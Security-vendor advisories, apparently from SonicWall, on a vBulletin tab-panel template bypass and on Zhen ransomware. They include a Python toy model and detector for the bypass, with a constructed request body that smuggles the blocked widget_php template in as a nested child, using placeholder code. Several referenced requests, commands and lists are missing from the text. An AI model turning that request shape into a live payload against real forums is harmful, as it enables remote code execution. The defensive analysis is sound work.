In the POST request below, the child template name is widget_php and the malicious code is passed through the subWidgets elements, allowing remote code execution.


A remote, unauthenticated attacker could exploit this vulnerability by sending the above crafted request to the vulnerable server. Successful exploitation could result in remote code execution.
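The description above explains the bypass as a check that looked at the requested template name but not at the child templates a tab panel loads. The following added example is not vBulletin's code; it is a toy model of that dispatch showing why the depth-0 check was insufficient, together with a parser for the PHP-style bracket parameters (subWidgets[0][template]=...) such a request carries, so a WAF or log review can look for the blocked template at any nesting depth. The request body is constructed, the PHP “code” value is a placeholder string that is never executed, and the allowlist of permitted child templates is this example's hardening choice rather than vBulletin's actual fix.

```python
"""Added example; not vBulletin's code but a toy model of the template dispatch
described above. The request body is constructed; the "code" value is a
placeholder and nothing is executed."""
import re
from typing import Any, Dict, List
from urllib.parse import parse_qs

BLOCKED_TEMPLATES = {"widget_php"}
CONTAINER_TEMPLATE = "widget_tabbedcontainer_tab_panel"
# Child templates a tab panel may load; an allowlist is this example's
# hardening choice, not necessarily the vendor's fix.
ALLOWED_CHILD_TEMPLATES = {"widget_text", "widget_activitystream"}


def parse_php_query(body: str) -> Dict[str, Any]:
    """Turn a[b][c]=v form fields into nested dicts, the way PHP fills $_POST."""
    tree: Dict[str, Any] = {}
    for key, values in parse_qs(body, keep_blank_values=True).items():
        m = re.match(r"^([^\[\]]+)((?:\[[^\]]*\])*)$", key)
        if not m:
            continue
        path = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = tree
        for part in path[:-1]:
            node = node.setdefault(part, {})
        node[path[-1]] = values[-1]
    return tree


def find_blocked_templates(tree: Any, path: tuple = ()) -> List[str]:
    """Paths of every 'template' key naming a blocked template, at any depth."""
    hits: List[str] = []
    if isinstance(tree, dict):
        for key, value in tree.items():
            if key == "template" and value in BLOCKED_TEMPLATES:
                hits.append("/".join(path + (key,)))
            hits.extend(find_blocked_templates(value, path + (key,)))
    return hits


def _render(template: str, config: Dict[str, Any], hardened: bool, depth: int = 0) -> List[str]:
    # The original CVE-2019-16759 fix, as described above, checked only the
    # requested template name (depth 0). The hardened variant checks every
    # level and restricts which child templates a container may load.
    if template in BLOCKED_TEMPLATES and (depth == 0 or hardened):
        return [f"blocked:{template}"]
    if hardened and depth > 0 and template not in ALLOWED_CHILD_TEMPLATES:
        return [f"blocked:{template}"]
    out = [f"rendered:{template}"]
    if template == CONTAINER_TEMPLATE:
        for child in config.get("subWidgets", {}).values():
            out.extend(_render(child.get("template", ""), child.get("config", {}),
                               hardened, depth + 1))
    return out


def render_original_patch(template: str, config: Dict[str, Any]) -> List[str]:
    return _render(template, config, hardened=False)


def render_hardened(template: str, config: Dict[str, Any]) -> List[str]:
    return _render(template, config, hardened=True)


# Constructed body modelled on the bypass: the container template is requested
# and the blocked template is smuggled in as its child.
SAMPLE_BODY = "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=PLACEHOLDER_PHP"

if __name__ == "__main__":
    tree = parse_php_query(SAMPLE_BODY)
    print("blocked templates in request:", find_blocked_templates(tree))
    print("original patch:", render_original_patch(CONTAINER_TEMPLATE, tree))
    print("hardened:      ", render_hardened(CONTAINER_TEMPLATE, tree))
```

With the original check, the container renders and then renders its widget_php child, which is the bypass; the hardened dispatch refuses the child. The request-side parser is the piece a defender can reuse directly: any request whose nested subWidgets data names widget_php is worth blocking or alerting on regardless of which top-level template is requested.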

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15163 vBulletin widget_tabbedContainer_tab_panel Remote Command Execution

Affected Products:

All versions of vBulletin prior to 5.6.x are affected by this vulnerability. Users should migrate to a patched version as soon as possible.

Zhen ransomware actively spreading in the wild

The SonicWall Capture Labs threat research team observed reports of a new variant family of Zhen ransomware [Zhen.RSM] actively spreading in the wild.

The Zhen ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. < . Zhen >
    • %App.path%\ payment request.txt > recovery instruction

Once the computer is compromised, the ransomware runs the following commands (actual source code):

When encrypting files it uses the AES encryption algorithm and only encrypts files that match the following extensions:

The ransomware encrypts all the files and appends the [Zhen] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware displays the following image, which tells the victim that the computer has been encrypted and to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signatures:

  • GAV: ZHEN.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.